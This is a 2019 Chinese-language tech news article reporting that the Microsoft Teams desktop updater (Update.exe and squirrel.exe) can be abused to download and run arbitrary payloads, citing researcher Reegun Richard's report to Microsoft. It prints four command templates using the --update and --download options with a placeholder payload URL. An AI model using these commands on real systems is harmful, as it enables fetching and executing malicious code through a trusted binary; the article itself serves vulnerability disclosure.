您正在使用IE低版浏览器,为了您的雷峰网账号安全和更好的产品体验,强烈建议使用更快更安全的浏览器
此为临时链接,仅用于文章预览,将在时失效
政企安全 正文
发私信给李勤
发送

0

Microsoft Teams 升级机制允许黑客执行任意文件

本文作者: 李勤 2019-06-30 12:37
导语:同时,它也会影响到计算机上的GitHub、WhatApp和UiPath软件,用来下载有效载荷。

雷锋网消息,据 BleepingComputer 美国时间 6 月 29 日报道,多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和执行任意文件,

研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。

使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

这些命令可以与其他参数一起使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的方法适用于“squirrel.exe”,它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一部分。

安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时,应用程序仍然容易受到攻击,因为微软通知研究员该修复程序将在未来的软件版本中出现。

来源:BleepingComputer 

雷峰网版权文章,未经授权禁止转载。详情见转载须知

分享:
相关文章

编辑、作者

跟踪互联网安全、黑客、极客。微信:qinqin0511。
当月热门文章
最新文章
请填写申请人资料
姓名
电话
邮箱
微信号
作品链接
个人简介
为了您的账户安全,请验证邮箱
您的邮箱还未验证,完成可获20积分哟!
请验证您的邮箱
立即验证
完善账号信息
您的账号已经绑定,现在您可以设置密码以方便用邮箱登录
立即设置 以后再说